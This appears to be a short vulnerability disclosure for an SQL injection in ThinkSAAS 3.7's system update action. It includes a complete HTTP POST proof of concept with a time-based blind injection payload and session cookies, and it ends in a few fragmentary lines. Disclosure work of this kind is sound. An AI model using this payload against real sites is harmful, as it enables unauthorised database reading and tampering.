ThinkSAAS is a lightweight open source community system that can be used to build vertical networks.
ThinkSAAS is a simple, highly scalable community development system.
ThinkSAAS can help you quickly develop and build a unique communication community.
Github address:https://github.com/thinksaas/ThinkSAAS
There is an SQL injection vulnerability in ThinkSAAS version 3.7. *. This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Due to insufficient verification of user input, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations
In the thinksaas \\ app \\ system \\ action \\ update.php file
in twodo , $db ->query ($item);
跟进,在thinksaas\thinksaas\mysqli.php中,Directly executing database commands exists,
Causing direct execution of SQL commands
POST /index.php?app=system&ac=update&ts=twodo HTTP/1.1
Host: www.thinksaas.eek
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: <http://www.thinksaas.eek/index.php?app=system>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1718963392,1719036380,1719038907; ts_email=admin%40admin.com; ts_autologin=r8c8fpaaho0scsswkocosokcgsgcs84; PHPSESSID=l801643rf88v9fvl6ka866nlk0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
upsql=SELECT if(ASCII(SUBSTRING((SELECT DATABASE()),1,1)) = 116 ,sleep(3),0);
Log in to the backend as an administrator
Generate a target folder in the root directory
databse